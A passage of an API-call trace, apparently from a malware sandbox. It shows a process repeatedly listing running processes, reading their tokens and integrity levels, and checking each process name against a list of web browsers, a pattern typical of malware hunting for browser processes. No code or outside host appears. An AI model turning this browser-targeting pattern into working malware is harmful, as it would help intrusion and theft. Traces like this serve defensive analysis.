ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0569.254] GetLastError () returned 0x7a [0569.254] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0569.254] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0569.254] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0569.254] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0569.254] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0569.254] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0569.254] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0569.255] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0569.255] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0569.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0569.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0569.255] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0569.255] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0569.255] GetLastError () returned 0x7a [0569.255] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0569.255] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0569.255] CloseHandle (hObject=0x29c) returned 1 [0569.256] CloseHandle (hObject=0x298) returned 1 [0569.256] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0569.256] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0569.256] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0569.256] GetLastError () returned 0x7a [0569.256] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0569.256] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0569.256] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0569.257] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0569.257] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0569.257] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0569.257] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0569.257] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0569.257] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0569.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0569.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0569.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0569.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0569.257] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0569.258] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0569.258] GetLastError () returned 0x7a [0569.258] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0569.258] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0569.258] CloseHandle (hObject=0x29c) returned 1 [0569.258] CloseHandle (hObject=0x298) returned 1 [0569.258] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0569.258] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0569.258] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0569.259] GetLastError () returned 0x7a [0569.259] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0569.259] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0569.259] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0569.259] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0569.259] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0569.259] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0569.259] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0569.259] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0569.259] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0569.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0569.260] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0569.261] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0571.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9f28) returned 0xc0000004 [0571.264] VirtualAlloc (lpAddress=0x0, dwSize=0xaf28, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0571.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xaf28, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0571.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0571.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0571.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0571.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0571.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0571.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0571.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0571.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0571.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0571.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0571.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0571.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0571.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0571.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0571.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0571.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0571.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0571.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0571.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0571.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0571.268] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0571.268] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0571.268] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0571.268] GetLastError () returned 0x7a [0571.269] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0571.269] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0571.269] CloseHandle (hObject=0x29c) returned 1 [0571.269] CloseHandle (hObject=0x298) returned 1 [0571.269] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0571.269] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0571.269] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0571.269] GetLastError () returned 0x7a [0571.269] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0571.269] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0571.269] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0571.269] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0571.269] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0571.269] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0571.269] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0571.269] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0571.269] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0571.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0571.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0571.269] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0571.269] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0571.269] GetLastError () returned 0x7a [0571.269] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0571.269] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0571.269] CloseHandle (hObject=0x29c) returned 1 [0571.269] CloseHandle (hObject=0x298) returned 1 [0571.269] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0571.269] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0571.269] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0571.269] GetLastError () returned 0x7a [0571.269] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0571.269] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0571.269] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0571.269] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0571.269] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0571.270] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0571.270] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0571.270] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0571.270] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0571.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0571.270] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0571.270] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0571.270] GetLastError () returned 0x7a [0571.270] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0571.270] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0571.270] CloseHandle (hObject=0x29c) returned 1 [0571.270] CloseHandle (hObject=0x298) returned 1 [0571.270] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0571.270] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0571.270] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0571.270] GetLastError () returned 0x7a [0571.270] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0571.270] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0571.270] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0571.270] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0571.270] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0571.270] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0571.270] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0571.270] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0571.270] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0571.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0571.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0571.270] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0571.270] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0571.270] GetLastError () returned 0x7a [0571.270] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0571.270] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0571.270] CloseHandle (hObject=0x29c) returned 1 [0571.270] CloseHandle (hObject=0x298) returned 1 [0571.270] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0571.270] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0571.270] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0571.270] GetLastError () returned 0x7a [0571.271] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0571.271] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0571.271] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0571.271] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0571.271] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0571.271] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0571.271] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0571.271] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0571.271] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0571.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0571.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0571.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0571.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0571.271] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0571.271] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0571.271] GetLastError () returned 0x7a [0571.271] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0571.271] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0571.271] CloseHandle (hObject=0x29c) returned 1 [0571.271] CloseHandle (hObject=0x298) returned 1 [0571.271] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0571.271] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0571.271] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0571.271] GetLastError () returned 0x7a [0571.271] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0571.271] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0571.271] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0571.271] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0571.271] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0571.271] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0571.271] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0571.271] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0571.271] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0571.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0571.271] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0571.272] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0573.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9f28) returned 0xc0000004 [0573.276] VirtualAlloc (lpAddress=0x0, dwSize=0xaf28, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0573.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xaf28, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0573.277] OpenProcess (dwDesiredAccess=0x400, 